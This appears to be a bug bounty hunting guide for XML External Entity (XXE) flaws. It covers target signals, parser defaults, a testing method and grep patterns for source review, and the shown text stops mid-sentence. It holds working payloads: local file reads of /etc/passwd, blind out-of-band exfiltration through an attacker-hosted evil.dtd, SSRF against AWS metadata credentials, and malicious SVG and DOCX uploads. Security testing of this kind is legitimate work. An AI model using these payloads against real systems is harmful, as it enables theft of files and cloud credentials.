Crown Jewel Targets

XXE is typically rated high or critical and often pays near the top of bug bounty scales ($5,000–$30,000+) because it leads directly to sensitive data exfiltration and SSRF. Highest-value targets:

Large enterprise platforms with XML-heavy backend integrations (finance, logistics, ride-sharing APIs)
Domains with file-read capability — /etc/passwd, /etc/shadow, internal config files, AWS metadata endpoints
Subdomains sharing backend infrastructure — one XXE endpoint can pivot to internal services across dozens of domains (as demonstrated by 26+ Uber domains via a single entry point)
API gateways accepting XML content types — especially REST APIs that silently accept Content-Type: application/xml
File upload features — SVG, DOCX, XLSX, PDF, PPTX parsers on the server side
SAML/SSO endpoints — SAML assertions are XML-based and frequently vulnerable
Office/document processing services — any feature that converts or processes user-supplied documents

Attack Surface Signals

URL Patterns

/api/v*/xml
/upload
/import
/parse
/convert
/saml/acs
/sso/saml
/feed
/rss
/sitemap
/webdav
/soap/*
/wsdl
/service.asmx
/xmlrpc
/graphql (multipart with XML)
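
The path patterns above can be turned into a quick triage filter over a list of crawled URLs. The following is a minimal sketch only: the name `looks_like_xml_endpoint` and the regular expression are illustrative assumptions, and a match is a hint to test the endpoint, not proof that it parses XML.

```python
import re
from urllib.parse import urlparse

# Path fragments copied from the URL pattern list (illustrative, not exhaustive).
# The trailing group requires a segment boundary so "/important" does not match "/import".
XML_PATH_HINTS = re.compile(
    r"/(?:api/v\d+/xml|upload|import|parse|convert|saml/acs|sso/saml|feed|rss|"
    r"sitemap|webdav|soap|wsdl|service\.asmx|xmlrpc|graphql)(?:/|\.|$)",
    re.IGNORECASE,
)

def looks_like_xml_endpoint(url: str) -> bool:
    """Return True when the URL path contains one of the XML-related hints."""
    path = urlparse(url).path
    return XML_PATH_HINTS.search(path) is not None
```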

Request/Response Headers

Content-Type: application/xml
Content-Type: text/xml
Content-Type: application/soap+xml
Content-Type: multipart/form-data  ← check file upload fields
Accept: application/xml
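X-Content-Type-Options: (absent; only a weak hint of lax header hygiene, since this header controls browser MIME sniffing and says nothing about the server's XML parser)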
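
When filtering proxy history for the content types listed above, it helps to normalise the header first, because real traffic carries parameters such as `charset`. A small sketch under that assumption (the helper name `is_xml_content_type` is hypothetical):

```python
def is_xml_content_type(header_value: str) -> bool:
    """Return True for application/xml, text/xml, and any media type ending in +xml."""
    # Drop parameters such as "; charset=utf-8" and normalise case.
    media_type = header_value.split(";", 1)[0].strip().lower()
    return media_type in {"application/xml", "text/xml"} or media_type.endswith("+xml")
```

This also catches `image/svg+xml`, which ties in with the file upload targets.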

JavaScript Patterns (source recon)

// Look for these in JS bundles and any exposed server-side source (lxml is a Python library)
XMLSerializer
DOMParser
parseFromString
new ActiveXObject("Microsoft.XMLDOM")
$.parseXML(
xml2js
libxmljs
lxml

Tech Stack Signals

Java stacks: Spring, Struts, JAX-WS — default XML parsers (SAX, DOM) are XXE-vulnerable without explicit hardening
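PHP: simplexml_load_string(), DOMDocument::loadXML() — vulnerable by default only with libxml2 older than 2.9.0, or whenever LIBXML_NOENT is passed; PHP 8.0+ requires libxml2 2.9.0 or later
Python: lxml (resolves entities by default before 5.0), xml.etree (does not expand external entities), xml.sax (processed external general entities by default before Python 3.7.1)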
Ruby: Nokogiri older versions, REXML
Node.js: xml2js, libxmljs, fast-xml-parser (older versions)
WSDL/SOAP services: Always test — legacy XML parsing virtually guaranteed
File parsers: Apache POI (Java), python-docx, LibreOffice integrations
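
Parser defaults like the ones listed above are easy to confirm locally before spending time on a target. As one example, this sketch checks how the standard library's `xml.etree.ElementTree` treats an external entity; the function name and the sample document are assumptions made for illustration. The Python documentation states that this module does not expand external entities and raises `ParseError` when one occurs.

```python
import xml.etree.ElementTree as ET

# Sample document declaring an external entity (the file is never read by ElementTree).
DOC = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
    "<root>&xxe;</root>"
)

def etree_resolves_external_entity(document: str) -> bool:
    """Return True only if parsing succeeds and the entity expanded into text."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError:
        # ElementTree rejects the unresolved entity reference instead of fetching it.
        return False
    return bool(root.text)
```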

Step-by-Step Hunting Methodology

Map every XML entry point — Use Burp Suite passive scanner to flag all requests/responses with XML content types. Also intercept JSON endpoints and manually swap Content-Type to application/xml with equivalent XML body.
Identify file upload features — Upload SVG, DOCX, XLSX, and observe if the server processes/renders content. These are often XML under the hood.
Attempt inline XXE (classic file read) — Replace the XML body with a basic entity test payload targeting /etc/passwd or C:\Windows\win.ini. Observe if the value is reflected in the response.
If no reflection, pivot to Blind OOB — Set up an OOB listener (Burp Collaborator, interactsh, or a self-hosted netcat server). Inject an external entity pointing to your callback URL. Confirm DNS/HTTP hit to validate the parser is making outbound connections.
Escalate Blind OOB to file exfiltration — Use a two-stage payload: first entity loads local file, second entity sends it OOB via HTTP parameter or DNS exfiltration.
Test SSRF pivot — Point the external entity at internal network addresses (http://169.254.169.254/latest/meta-data/, http://10.0.0.1/, http://localhost:8080/admin). Look for differences in response timing or error messages.
Test all subdomains sharing the same backend — If one subdomain is vulnerable, enumerate and test all others systematically. Shared backend infrastructure means shared vulnerability.
Test parameter-level injection — Some endpoints parse only specific XML nodes. Inject entities into every element value, attribute value, and even element names.
Test for error-based exfiltration — If OOB is blocked, trigger XML parsing errors that include file content in the error message returned to the client.
Document the full impact chain — Demonstrate: file read → SSRF → internal service access → note which internal domains/IPs are reachable.
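
For the in-band step of the methodology above, reflection can be checked automatically by looking for well-known markers of the target files in the response body. This is a rough sketch: the marker patterns and the name `detect_file_read` are assumptions, and a miss does not rule out blind XXE.

```python
import re

# Recognisable fragments of the two files used in the classic test payloads.
FILE_MARKERS = {
    "/etc/passwd": re.compile(r"root:[^:]*:0:0:"),
    "win.ini": re.compile(r"\[fonts\]", re.IGNORECASE),
}

def detect_file_read(body: str) -> list[str]:
    """Return the names of files whose markers appear in the response body."""
    return [name for name, pattern in FILE_MARKERS.items() if pattern.search(body)]
```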

Payload & Detection Patterns

Classic In-Band File Read

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>

Windows Equivalent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>

Blind OOB — DNS/HTTP Callback

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR.BURPCOLLABORATOR.net/xxe-test">
]>
<root><data>&xxe;</data></root>

Blind OOB — File Exfiltration via Parameter Entity (two-stage)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://YOUR-SERVER/evil.dtd">
  %dtd;
]>
<root><data>&send;</data></root>

evil.dtd (hosted on attacker server):

<!ENTITY % all "<!ENTITY send SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
%all;
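
On the receiving side, the exfiltrated value arrives in the `data` query parameter named in evil.dtd. A minimal sketch of pulling it out of a logged request line (the helper `extract_exfil` is hypothetical, and any HTTP server that logs request paths would serve the same purpose):

```python
from typing import Optional
from urllib.parse import urlparse, parse_qs

def extract_exfil(request_path: str, param: str = "data") -> Optional[str]:
    """Return the URL-decoded value of `param` from a request path, or None if absent."""
    query = parse_qs(urlparse(request_path).query, keep_blank_values=True)
    values = query.get(param)
    return values[0] if values else None
```

Files containing newlines or URL-special characters may not survive this channel on every parser, so a single-line file such as /etc/hostname is a safer first target than /etc/passwd.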

SSRF via XXE (AWS Metadata)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&ssrf;</data></root>
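
When recording which internal targets were reachable through the entity, a consistent label per address makes the impact chain easier to read. The sketch below uses the standard `ipaddress` module; the function name and the label strings are assumptions chosen for illustration.

```python
import ipaddress
from urllib.parse import urlparse

def classify_target(url: str) -> str:
    """Label a URL's host as loopback, link-local, private, public, or hostname."""
    host = urlparse(url).hostname or ""
    if host == "localhost":
        return "loopback"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal; resolving names is out of scope for this sketch.
        return "hostname"
    if addr.is_loopback:
        return "loopback"
    if addr.is_link_local:
        # Covers 169.254.0.0/16, which includes the cloud metadata address.
        return "link-local"
    if addr.is_private:
        return "private"
    return "public"
```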

SVG XXE (for file upload endpoints)

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="14" x="0" y="16">&xxe;</text>
</svg>

DOCX/XLSX XXE — Inject into `[Content_Types].xml` or `word/document.xml`

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Types xmlns="..."><Default Extension="rels" ContentType="&xxe;"/></Types>
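
DOCX and XLSX files are ZIP archives of XML parts, which is why parts like `[Content_Types].xml` are candidate injection points. The sketch below lists the XML parts of such a container using the standard `zipfile` module. `build_sample_container` produces a tiny stand-in archive purely for demonstration, not a valid Office document, and both function names are hypothetical.

```python
import io
import zipfile

def list_xml_parts(container: bytes) -> list[str]:
    """Return the sorted names of XML and relationship parts inside a ZIP container."""
    with zipfile.ZipFile(io.BytesIO(container)) as archive:
        return sorted(
            name for name in archive.namelist()
            if name.endswith((".xml", ".rels"))
        )

def build_sample_container() -> bytes:
    """Build an in-memory ZIP that mimics the layout of a DOCX (demonstration only)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<document/>")
        archive.writestr("word/media/image1.png", b"\x89PNG")
    return buffer.getvalue()
```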

Content-Type Swap (JSON to XML)

# Original JSON request
curl -X POST https://target.com/api/endpoint \
  -H "Content-Type: application/json" \
  -d '{"user":"test"}'

# Converted to XML for XXE testing
curl -X POST https://target.com/api/endpoint \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://COLLABORATOR.net">]><user>&xxe;</user>'
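
Building the "equivalent XML body" by hand gets tedious for larger JSON payloads. A minimal conversion sketch follows, assuming JSON keys are valid XML element names and that list items can be wrapped in an `item` element. Both choices and the default root name are guesses, since the element names the server actually expects have to be inferred per target.

```python
import json
import xml.etree.ElementTree as ET

def json_to_xml(json_body: str, root_name: str = "root") -> str:
    """Convert a JSON document into a naive element-per-key XML string."""
    def build(parent: ET.Element, value) -> None:
        if isinstance(value, dict):
            # Each key becomes a child element (keys must be valid XML names).
            for key, child in value.items():
                build(ET.SubElement(parent, key), child)
        elif isinstance(value, list):
            for item in value:
                build(ET.SubElement(parent, "item"), item)
        else:
            parent.text = "" if value is None else str(value)

    root = ET.Element(root_name)
    build(root, json.loads(json_body))
    return ET.tostring(root, encoding="unicode")
```

The output carries no DOCTYPE; the entity declaration from the test payloads still has to be prepended separately.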

Grep Patterns for Source Code Review

# PHP
grep -rn "simplexml_load_string\|DOMDocument\|xml_parse\|loadXML\|SimpleXMLElement" .

# Java
grep -rn "DocumentBuilder\|SAXParser\|XMLReader\|XMLInputFactory\|TransformerFactory" .

# Python
grep -rn "lxml\|xml.sax\|parseString\|fromstring\|etree.parse" .

# Hardening calls: parser usage with no matches here suggests missing hardening
grep -rn "FEATURE_EXTERNAL_GENERAL_ENTITIES\|setExpandEntityReferences\|setFeature.*false" .
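
The same review can be scripted so that parser usage and hardening are reported together per file. A small sketch, assuming the file's text has already been read; the pattern lists are partial and `review_source` is a hypothetical helper name. The hardening hints include the widely used `disallow-doctype-decl` and `external-general-entities` feature URIs, Java's `FEATURE_SECURE_PROCESSING`, and lxml's `resolve_entities=False`.

```python
import re

# Parser entry points drawn from the grep patterns (partial list).
PARSER_APIS = re.compile(
    r"simplexml_load_string|DOMDocument|SimpleXMLElement|DocumentBuilder|"
    r"SAXParser|XMLReader|XMLInputFactory|TransformerFactory|etree\.parse|xml\.sax"
)
# Strings that usually indicate someone configured entity handling explicitly.
HARDENING_HINTS = re.compile(
    r"disallow-doctype-decl|external-general-entities|FEATURE_SECURE_PROCESSING|"
    r"setExpandEntityReferences|resolve_entities\s*=\s*False"
)

def review_source(text: str) -> dict:
    """Report which parser APIs appear and whether any hardening hint is present."""
    return {
        "parser_apis": sorted(set(PARSER_APIS.findall(text))),
        "hardened": HARDENING_HINTS.search(text) is not None,
    }
```

A file with parser APIs and `hardened` set to False is a candidate for manual review, not a confirmed finding.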

Common Root Causes

Default parser configurations — Java's DocumentBuilderFactory resolves external entities unless hardened, as did Python's lxml before 5.0 and PHP's DOMDocument when built against libxml2 older than 2.9.0. Developers use them without reading the security docs.
Framework upgrades without security re-review — Older versions of Spring, Struts, and similar frameworks enabled XXE by default; developers didn't re-audit XML handling when libraries changed.
Hidden XML consumption — Developers accept JSON at the API layer but convert to XML internally, or use libraries (Apache POI, python-docx) to process uploads without realizing those formats are XML containers.
Copy-paste code from StackOverflow — XML parsing examples online rarely include entity disabling. Developers copy minimal working examples straight into production.
SAML/SSO library misconfigurations — SSO integrations often delegate XML parsing to third-party libraries with XXE enabled; developers assume "library handles security."
Testing gaps on non-primary content types — QA
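
For contrast with the default-configuration root cause above, this is roughly what explicit hardening looks like in code, which is the thing to look for (or find missing) during review. The sketch uses Python's standard `xml.sax` as one example; the function name is hypothetical, and other stacks expose equivalent switches under different names.

```python
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes

def make_hardened_sax_parser():
    """Create a SAX parser with external general and parameter entities turned off."""
    parser = xml.sax.make_parser()
    # Explicitly disable external entity processing rather than relying on defaults,
    # which differ between Python versions.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    return parser
```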
